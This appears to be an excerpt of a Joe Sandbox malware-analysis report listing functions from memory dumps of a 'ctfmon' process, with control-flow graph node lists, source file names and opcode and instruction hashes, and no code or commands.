                                                    control_flow_graph 415 7ffd9bae9340-7ffd9bb046df 417 7ffd9bb046e6-7ffd9bb04737 415->417 418 7ffd9bb046e1 415->418 423 7ffd9bb0473b-7ffd9bb04749 417->423 418->417 425 7ffd9bb0474b 423->425 426 7ffd9bb04750-7ffd9bb04779 423->426 425->426 426->423 428 7ffd9bb0477b-7ffd9bb04797 426->428 430 7ffd9bb04799 428->430 431 7ffd9bb0479e-7ffd9bb04803 428->431 430->431 436 7ffd9bb0480a 431->436 437 7ffd9bb04805 431->437 438 7ffd9bb0480b-7ffd9bb04849 436->438 437->436 440 7ffd9bb0484b-7ffd9bb0486f 438->440 442 7ffd9bb04876-7ffd9bb0487f call 7ffd9bae95d0 440->442 443 7ffd9bb04871 440->443 445 7ffd9bb04884-7ffd9bb048c1 442->445 443->442 446 7ffd9bb048c8-7ffd9bb04915 call 7ffd9bae9630 445->446 447 7ffd9bb048c3 445->447 454 7ffd9bb0491c-7ffd9bb0497a 446->454 455 7ffd9bb04917 446->455 447->446 459 7ffd9bb0497c 454->459 460 7ffd9bb04981-7ffd9bb04998 454->460 455->454 459->460 462 7ffd9bb0499a-7ffd9bb049b1 460->462 463 7ffd9bb049b5-7ffd9bb054f9 460->463 468 7ffd9bb06401-7ffd9bb0642c 463->468 469 7ffd9bb054ff 463->469 469->468
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: b2e9ec359548f314259a9e6291fd5aa051bb041cb0c56f7320acba2e8e6f6fe7
                                                    • Instruction ID: 86ec97baf6985edcb23123f0b91e38bd464a7bc8f4b27132d1aa9cc2b780ddd4
                                                    • Opcode Fuzzy Hash: b2e9ec359548f314259a9e6291fd5aa051bb041cb0c56f7320acba2e8e6f6fe7
                                                    • Instruction Fuzzy Hash: A5A1CE3090E78D8FEB65EF6488696F97BB0FF16304F0541BAD448C71E6DA38A658CB41
                                                    Function 00007FFD9C1DC7A9 Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 472 7ffd9c1dc7a9-7ffd9c1dc7ab 473 7ffd9c1dc82c-7ffd9c1dc831 472->473 474 7ffd9c1dc7ad-7ffd9c1dc7b1 472->474 477 7ffd9c1dc832-7ffd9c1dc835 473->477 475 7ffd9c1dc822-7ffd9c1dc823 474->475 476 7ffd9c1dc7b3-7ffd9c1dc7b6 474->476 478 7ffd9c1dc824 475->478 479 7ffd9c1dc89f 475->479 476->477 480 7ffd9c1dc7b8 476->480 481 7ffd9c1dc836-7ffd9c1dc848 477->481 482 7ffd9c1dc895-7ffd9c1dc898 478->482 483 7ffd9c1dc825-7ffd9c1dc829 478->483 486 7ffd9c1dc910 479->486 487 7ffd9c1dc8a0-7ffd9c1dc8a1 479->487 484 7ffd9c1dc7ba-7ffd9c1dc7c5 480->484 485 7ffd9c1dc7ff-7ffd9c1dc819 480->485 500 7ffd9c1dc84c-7ffd9c1dc854 481->500 495 7ffd9c1dc899 482->495 496 7ffd9c1dc914-7ffd9c1dc919 482->496 489 7ffd9c1dc82b 483->489 490 7ffd9c1dc8a5 483->490 484->481 491 7ffd9c1dc7c7-7ffd9c1dc7cb 484->491 516 7ffd9c1dc88a-7ffd9c1dc893 485->516 517 7ffd9c1dc81b-7ffd9c1dc81d 485->517 492 7ffd9c1dc912 486->492 493 7ffd9c1dc89d-7ffd9c1dc89e 486->493 488 7ffd9c1dc8a2-7ffd9c1dc8a4 487->488 488->490 489->473 499 7ffd9c1dc872-7ffd9c1dc887 489->499 497 7ffd9c1dc926-7ffd9c1dc92a 490->497 498 7ffd9c1dc8a6 490->498 491->500 501 7ffd9c1dc7cd-7ffd9c1dc7d0 491->501 492->496 493->479 502 7ffd9c1dc91a 493->502 495->502 503 7ffd9c1dc89a 495->503 496->502 507 7ffd9c1dc92c 497->507 508 7ffd9c1dc931-7ffd9c1dc943 497->508 505 7ffd9c1dc8a7-7ffd9c1dc8ac 498->505 506 7ffd9c1dc8ed-7ffd9c1dc8ff 498->506 499->516 512 7ffd9c1dc855 500->512 513 7ffd9c1dc8d0-7ffd9c1dc8d4 500->513 501->500 509 7ffd9c1dc7d2-7ffd9c1dc7d7 501->509 510 7ffd9c1dc91c-7ffd9c1dc922 502->510 511 7ffd9c1dc975-7ffd9c1dc976 502->511 514 7ffd9c1dc89b-7ffd9c1dc89c 503->514 515 7ffd9c1dc8e1-7ffd9c1dc8e6 503->515 526 7ffd9c1dc8ae-7ffd9c1dc8c3 505->526 531 7ffd9c1dc905 506->531 507->508 521 7ffd9c1dc7d9-7ffd9c1dc7fe 509->521 522 7ffd9c1dc858-7ffd9c1dc859 509->522 518 7ffd9c1dc8e8-7ffd9c1dc8ec 510->518 519 7ffd9c1dc924 510->519 528 7ffd9c1dc8c6-7ffd9c1dc8cd 512->528 529 7ffd9c1dc856-7ffd9c1dc857 512->529 527 7ffd9c1dc8d5 513->527 514->493 530 7ffd9c1dc8e7 515->530 523 7ffd9c1dc894 516->523 524 7ffd9c1dc90f 516->524 517->495 525 7ffd9c1dc81f 517->525 518->506 519->497 521->485 522->527 535 7ffd9c1dc85a 522->535 523->482 523->531 524->486 532 7ffd9c1dc866 525->532 533 7ffd9c1dc821 525->533 526->528 539 7ffd9c1dc8db-7ffd9c1dc8dd 527->539 528->513 529->522 530->518 531->510 532->530 536 7ffd9c1dc867 532->536 533->475 535->539 540 7ffd9c1dc85b 535->540 536->526 541 7ffd9c1dc868-7ffd9c1dc871 536->541 539->515 540->488 542 7ffd9c1dc85c-7ffd9c1dc85f 540->542 541->499 542->539 543 7ffd9c1dc861-7ffd9c1dc865 542->543 543->515 543->532
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: [^H
                                                    • API String ID: 0-2846327662
                                                    • Opcode ID: 452d205d98186245f4cadc02aa84f53d539755e7a59766efc619deeb90970a77
                                                    • Instruction ID: 1233559938b448782d7fdd3d969801f431ab6a474adf45cd35945e0568fdb09b
                                                    • Opcode Fuzzy Hash: 452d205d98186245f4cadc02aa84f53d539755e7a59766efc619deeb90970a77
                                                    • Instruction Fuzzy Hash: 6A711632E0C44B4FE778DA5C88769B877E0EF44350F140BB9D09ED75A2FE18A8668785
                                                    Function 00007FFD9C1D3718 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 544 7ffd9c1d3718-7ffd9c1d3730 546 7ffd9c1d3738-7ffd9c1d3763 544->546 550 7ffd9c1d378c-7ffd9c1d3792 546->550 551 7ffd9c1d3799-7ffd9c1d379f 550->551 552 7ffd9c1d3765-7ffd9c1d377e 551->552 553 7ffd9c1d37a1-7ffd9c1d37a3 551->553 554 7ffd9c1d3875-7ffd9c1d3885 552->554 555 7ffd9c1d3784-7ffd9c1d3789 552->555 556 7ffd9c1d37a6 553->556 563 7ffd9c1d3887 554->563 564 7ffd9c1d3888-7ffd9c1d38d6 554->564 555->550 557 7ffd9c1d37ac-7ffd9c1d37b7 556->557 558 7ffd9c1d3693-7ffd9c1d36d8 556->558 557->556 565 7ffd9c1d37b9-7ffd9c1d37e1 557->565 558->551 562 7ffd9c1d36de-7ffd9c1d36e4 558->562 566 7ffd9c1d3695-7ffd9c1d386d 562->566 567 7ffd9c1d36e6 562->567 563->564 566->554 571 7ffd9c1d370f-7ffd9c1d3716 567->571 571->544 573 7ffd9c1d36e8-7ffd9c1d3701 571->573 573->554 575 7ffd9c1d3707-7ffd9c1d370c 573->575 575->571
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    • Opcode ID: 1dadc650124e02decec8f266715c86ac1c9341f21a16b5635fdbaa4a5b3dd3ec
                                                    • Instruction ID: b36133bb0cabe6446ff96a0646845431a3d99e268c8bea007edd09cecc3e8e55
                                                    • Opcode Fuzzy Hash: 1dadc650124e02decec8f266715c86ac1c9341f21a16b5635fdbaa4a5b3dd3ec
                                                    • Instruction Fuzzy Hash: DC517C72E0860E8FEB69DB98C4645BCB7B1FF48350F5042BED01AF7292DA396945CB14
                                                    Function 00007FFD9C1DF818 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    • Opcode ID: 885c80e8470e337617d7cb7babdc55267d804c9228fcaaa2f823126fba11a092
                                                    • Instruction ID: 4dec528e212f809886ae66d061b2568ec609f3471068efbbc3ae97e3df3b87ae
                                                    • Opcode Fuzzy Hash: 885c80e8470e337617d7cb7babdc55267d804c9228fcaaa2f823126fba11a092
                                                    • Instruction Fuzzy Hash: 3D514C32E0854F9FDB68DB98C4605BDB7B1FF48340F1042BAD01AF7296DA396A41CB45
                                                    Function 00007FFD9BC901B9 Relevance: 1.4, APIs: 1, Instructions: 143COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 614 7ffd9bc901b9-7ffd9bc901c5 615 7ffd9bc901c7-7ffd9bc901cf 614->615 616 7ffd9bc901d0-7ffd9bc902a2 CloseHandle 614->616 615->616 620 7ffd9bc902aa-7ffd9bc902fe 616->620 621 7ffd9bc902a4 616->621 621->620
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2981876795.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bc80000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 50f1a2cba34e6fb89efee8dd3830b5b1b364d1c32bf4b604b8c01f67c162b6b1
                                                    • Instruction ID: 4926c7fad1ccbf7ec3a957374ba1a39295ee8224e4befc959114c243b259ae86
                                                    • Opcode Fuzzy Hash: 50f1a2cba34e6fb89efee8dd3830b5b1b364d1c32bf4b604b8c01f67c162b6b1
                                                    • Instruction Fuzzy Hash: AD417C30D0864C8FDB59DFA8D895BEDBBF0FF5A311F1041AAD049E7292DA34A885CB01
                                                    Function 00007FFD9BAE9370 Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 624 7ffd9bae9370-7ffd9bb15df9 630 7ffd9bb15e00-7ffd9bb15e10 624->630 631 7ffd9bb15dfb 624->631 632 7ffd9bb15e16-7ffd9bb15e77 630->632 631->630 633 7ffd9bb15e7e-7ffd9bb15e92 632->633 634 7ffd9bb15e79 632->634 636 7ffd9bb15eaf-7ffd9bb1612f call 7ffd9baeabf0 633->636 637 7ffd9bb15e94-7ffd9bb15eab 633->637 634->633 637->636
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: 2ac82a409dbdabeeb3c29c3c7e7a0806d7524e38e8a75108936daf4db84ec6cf
                                                    • Instruction ID: 9153941e8ef5f6381c8f20447de4af147438d97c66535aed9e07a01c84ba6f98
                                                    • Opcode Fuzzy Hash: 2ac82a409dbdabeeb3c29c3c7e7a0806d7524e38e8a75108936daf4db84ec6cf
                                                    • Instruction Fuzzy Hash: E441B030A0860E8FDB64EF58C850AFE77B0FF58315F1041BAE459C72D2CA34AA54CB90
                                                    Function 00007FFD9BAE9350 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: 90803508ec956b07d3ba9389235228c05b2e096df3a40f63f76b1003c2a835a7
                                                    • Instruction ID: f5e864fd43503e6764b5613bff31be072283de75092d045c62fc815daf82ba16
                                                    • Opcode Fuzzy Hash: 90803508ec956b07d3ba9389235228c05b2e096df3a40f63f76b1003c2a835a7
                                                    • Instruction Fuzzy Hash: A531F431A0860E8FDB54EF68D8146EA77F0FF58319F1041B7E419CB2D6CA34A944CB90
                                                    Function 00007FFD9BAE93D7 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: 86f7d4effada31f3c720e0daa418c24ebac0248678c139c6177e463800947dc4
                                                    • Instruction ID: 59f82e90347c26ab1004c8d540301b2537fdcceaf80cb726485a4fd0525a339e
                                                    • Opcode Fuzzy Hash: 86f7d4effada31f3c720e0daa418c24ebac0248678c139c6177e463800947dc4
                                                    • Instruction Fuzzy Hash: CD31DF35A0864E8FDB54DF18C814AEA7BF0FF84314F0040BAE418C72E5CB34AA59CBA1
                                                    Function 00007FFD9BAE91D8 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: 687288ca4169bd4e36e78c5705146344da8ff6c515314fc57789abf454a38d60
                                                    • Instruction ID: 95c570017a65debba80a4ee7bc89fc266dbc595285021e0364b66adea81a393a
                                                    • Opcode Fuzzy Hash: 687288ca4169bd4e36e78c5705146344da8ff6c515314fc57789abf454a38d60
                                                    • Instruction Fuzzy Hash: 54019E30919B8D8FDB51EFA488187FA7BF0FF05304F4145BAE448C20A2DB38A658CB81
                                                    Function 00007FFD9BAE6003 Relevance: 1.1, Instructions: 1057COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 219036b51f89b54dffc74f2641ff14cab2bea88f1c9b611bd548ed81c5fade63
                                                    • Instruction ID: f1f561831954778e01f1759f37cb3ace7c827b0aa4bcea915eb7316cdf2773f4
                                                    • Opcode Fuzzy Hash: 219036b51f89b54dffc74f2641ff14cab2bea88f1c9b611bd548ed81c5fade63
                                                    • Instruction Fuzzy Hash: B7925B75E095198FE725DB68C5C8B9973E2FF59300F1189F1D118D73AACA34EE80CA61
                                                    Function 00007FFD9BAE79AD Relevance: .6, Instructions: 570COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e088f0834aa5af149a911eccb5bc69b4c851370c0d77d0fd62ebc89b182104ef
                                                    • Instruction ID: 4da946096fcdac2f6f6cde73c1a41097e6ebc06e5228ec2e505570eae41f747a
                                                    • Opcode Fuzzy Hash: e088f0834aa5af149a911eccb5bc69b4c851370c0d77d0fd62ebc89b182104ef
                                                    • Instruction Fuzzy Hash: E412903090968D8FCB95EF68C8696ED7FF0FF19300F0541AAE848C71A2DB78A955CB41
                                                    Function 00007FFD9BAEAD80 Relevance: .5, Instructions: 510COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 595768898bbb3561b2dbfe37f59c1cd7e1442e71e41f182fdff30dfb382b4a03
                                                    • Instruction ID: c1523cdc2564f7f28bf9de9647a9c485c8297b74fbb3c90f12cbd6916608b24c
                                                    • Opcode Fuzzy Hash: 595768898bbb3561b2dbfe37f59c1cd7e1442e71e41f182fdff30dfb382b4a03
                                                    • Instruction Fuzzy Hash: 37025F71E19A5D8FDBA8EF58C8A5BB8B7A1FF58304F0441BAD01DD72D2DA346980CB41
                                                    Function 00007FFD9C1D39AA Relevance: .5, Instructions: 468COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2ff25d2e0642bb240be5b894498439695ad4ea74b839af4714c6ab4f565df075
                                                    • Instruction ID: 514e528c8bcfdc79e060de07e474cdc783d51a35857ebe3fc00a7115891bf1f2
                                                    • Opcode Fuzzy Hash: 2ff25d2e0642bb240be5b894498439695ad4ea74b839af4714c6ab4f565df075
                                                    • Instruction Fuzzy Hash: E902D531A196468FEB69CF18C4E06B437B0FF49310F9446BDC44ADB68BDA38E881CB45
                                                    Function 00007FFD9BB1AA88 Relevance: .5, Instructions: 451COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a3798acbc7f86683c19e77a10cceccec5b7b5c985ac8fdc30441dc7e8779e7a8
                                                    • Instruction ID: 7c37dd118e811f20c49edc39ca3c3d5b9ad9a0eb34c33df8960d7b0aa34f83a7
                                                    • Opcode Fuzzy Hash: a3798acbc7f86683c19e77a10cceccec5b7b5c985ac8fdc30441dc7e8779e7a8
                                                    • Instruction Fuzzy Hash: B4F1BF3091968D8FDB55EF68C8A96ED7BF0FF59304F0141ABD848C71A2DB34AA54CB81
                                                    Function 00007FFD9C1D49D1 Relevance: .4, Instructions: 417COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f8de6d10ecdb997d796e0e7ce4c9420b8026c0802997e7f985af223fa15871a9
                                                    • Instruction ID: f894ac4cc4f82316987dfff24b75af7d5349a6df8fd0e0cd02ca7c4156846eb0
                                                    • Opcode Fuzzy Hash: f8de6d10ecdb997d796e0e7ce4c9420b8026c0802997e7f985af223fa15871a9
                                                    • Instruction Fuzzy Hash: D6E10032E0DB478FE378CB68D4A017577F1FF54340B1046BED48AD7682EA29B8428769
                                                    Function 00007FFD9C1D060F Relevance: .4, Instructions: 391COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d0af58843370a0c6553b454f7ec68bb049f794951fe7f5b63b00c3d0003566a9
                                                    • Instruction ID: 04b993b10a068fcaecbd786a2c5b0c321d1b8f2fadbd726fc853c9f8858eee29
                                                    • Opcode Fuzzy Hash: d0af58843370a0c6553b454f7ec68bb049f794951fe7f5b63b00c3d0003566a9
                                                    • Instruction Fuzzy Hash: 69510932E0D79B8FD7659BA898704E87FB0EF55354B4802BBD089DB0E3ED286846C745
                                                    Function 00007FFD9C1DBF49 Relevance: .4, Instructions: 378COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b0e5aacd460ed968cbade611ff7d685fdca2cffac6e68d18f7213d45ee1c95de
                                                    • Instruction ID: 992de046fc5b7b16f345f5f46a4c1e9a2f7d66134b5a31a6cf663f919890cd89
                                                    • Opcode Fuzzy Hash: b0e5aacd460ed968cbade611ff7d685fdca2cffac6e68d18f7213d45ee1c95de
                                                    • Instruction Fuzzy Hash: 18C1A332E0C91A8FEBB8DB48C8B5A6473F1FF55351F5006B9D01ED7292EE24AC458B85
                                                    Function 00007FFD9C1DCA39 Relevance: .4, Instructions: 377COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0f383a2d58f40e07dc197bbcaa2a090224059baf511ac34307d5aba296302798
                                                    • Instruction ID: 9c1012e75a2ba0f3f4dae69e8c96c1aca64049164e608c0a83ad5477e40423cf
                                                    • Opcode Fuzzy Hash: 0f383a2d58f40e07dc197bbcaa2a090224059baf511ac34307d5aba296302798
                                                    • Instruction Fuzzy Hash: D251B732E0C92BDAD378BF98A4715F97760EF54399F1407B6E00EDA1C6DE29684086C8
                                                    Function 00007FFD9C1DFA8F Relevance: .4, Instructions: 373COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bfa55ae29d478d331588a649e9a21e032646bbdee51f8542d32d05fb6a8f7ecf
                                                    • Instruction ID: 00d59d4390a9f9f2aeeb3786ee0ddb3d69bda364b4ab15e21a30a572d553b0f0
                                                    • Opcode Fuzzy Hash: bfa55ae29d478d331588a649e9a21e032646bbdee51f8542d32d05fb6a8f7ecf
                                                    • Instruction Fuzzy Hash: 04E1C131A18A478FEB59CF58C4E05B137B1FF45354B5442BDD84A8B68BDA38F981CB88
                                                    Function 00007FFD9C1DBCD0 Relevance: .4, Instructions: 371COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 050229357221a5951e1c8b3252d46986046a9faac65cf9624bc8b98c41d4230f
                                                    • Instruction ID: 167771db829df015eb2d030858d03ed487e117f895a3c5246fe949cf995a7198
                                                    • Opcode Fuzzy Hash: 050229357221a5951e1c8b3252d46986046a9faac65cf9624bc8b98c41d4230f
                                                    • Instruction Fuzzy Hash: 77C1B331B18A1E8FDB58DF58C8A59B9B3F2FF58314B1041A9D04EDB296DA35EC42CB44
                                                    Function 00007FFD9C1DFAAF Relevance: .3, Instructions: 333COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8346f83f7a50ed4c991ca44508ae8f370aabbe4e88baf2fe4187e6b5645feecb
                                                    • Instruction ID: 5ca2b3b41e8465803a6af2ea06d57703de45a7508438263a9c306616301c6176
                                                    • Opcode Fuzzy Hash: 8346f83f7a50ed4c991ca44508ae8f370aabbe4e88baf2fe4187e6b5645feecb
                                                    • Instruction Fuzzy Hash: 99C1C231A18A478BEB1DCF58C4E05B137B1FF45344B5446BDD88A8B68BEA38F581CB49
                                                    Function 00007FFD9C1DCAF7 Relevance: .3, Instructions: 330COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f454c108e78a5230e35dd6e2778c486709d74c10bde4f616c254b4f9c39af5f4
                                                    • Instruction ID: f3e8e16741a3beb315be26cd2c1ae665908986bc1d910133fe7e2c1c587facbf
                                                    • Opcode Fuzzy Hash: f454c108e78a5230e35dd6e2778c486709d74c10bde4f616c254b4f9c39af5f4
                                                    • Instruction Fuzzy Hash: 3631E833F0C96BCEE779DB9858314F87BB0AF55394F140A7AD00DE61C2DD2968008789
                                                    Function 00007FFD9BB0EB60 Relevance: .3, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: feb9dc3965d103f33916121d096fe6f8a9058fc5d40d3f99283b621f499e39d2
                                                    • Instruction ID: b65892215ae7b9ab2af179dd0a7456df7c65439b245bd43199c2e87ed1e9596f
                                                    • Opcode Fuzzy Hash: feb9dc3965d103f33916121d096fe6f8a9058fc5d40d3f99283b621f499e39d2
